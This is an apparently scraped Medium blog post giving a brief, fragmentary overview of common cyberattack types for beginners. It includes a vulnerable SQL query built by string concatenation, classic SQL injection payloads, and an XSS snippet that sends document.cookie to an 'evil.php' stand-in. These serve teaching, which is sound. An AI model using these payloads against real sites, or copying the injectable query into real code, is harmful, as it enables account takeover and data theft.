Cybersecurity — Understanding the Fundamentals IV (Attack Types)

I. Advanced Persistent Threat (APT) Attacks

Image by Pete Linforth from Pixabay
  • Advanced; Operatives behind APT have a full range of insight gathering strategies available to them.
  • Persistent; Operative’s main aim is to maintain long-term access to the targets to execute a specific task.
  • Threat; APTs are so advanced and sophisticated. They are huge threats to intellectual property (e.g. trade secrets or patents), sensitive information (e.g. military secrets), critical infrastructures (e.g. SCADA systems, nuclear plants) and total site takeovers which makes them one of the most concerned cyber threats nowadays.
APT Lifecycle

II. Denial-of-service (DoS) and Distributed-denial-of-service (DDoS) Attacks

Image by OpenClipart-Vectors from Pixabay
DDoS Stacheldraht Attack Diagram

III. Man-in-the-middle (MitM) Attack

MitM Attack Types

IV. Phishing and Spear-phishing Attacks

Image by Andrew Martin from Pixabay

V. SQL Injection (SQLI) Attacks

Image by Dimitri Houtteman from Pixabay
statement = "SELECT * FROM users WHERE name = '" + userName + "';"
' OR '1'='1' --
' OR '1'='1' {
' OR '1'='1' /*

VI. Cross-site Scripting (XSS) Attack

Image by Gerd Altmann from Pixabay
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);

VII. Brute-force and Dictionary Attacks

A Screenshot of Dictionary Attack

VIII. Drive-by Download Attack

Image by Gerd Altmann from Pixabay
  1. A person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet) automatically.
  2. Any download that happens without a person’s knowledge, often a computer virus, spyware, malware.




Cybersecurity | Artificial Intelligence | Blockchain

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

SSN -Sharing Security News

How to use EternalBlue to Exploit SMB Port using Public Wi-Fi

MobiKwik & The Increase In Data Breaches In India

Why I finally decided to get a job in Cyber

How Do You Clean and Disinfect a Memory FoamMattress?

Was NordVPN hacked or is it false? What Reddit has to say

Keeping Secrets in iOS app.

Log4Shell: The log4j Javageddon

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ensar Seker

Ensar Seker

Cybersecurity | Artificial Intelligence | Blockchain

More from Medium

Lemme Sniff Yer Packet!

THM Linux Fundamentals PT 1

Unix Systems: ls -la *.c?

Did I really just commit and push a file with a password in it?-Remove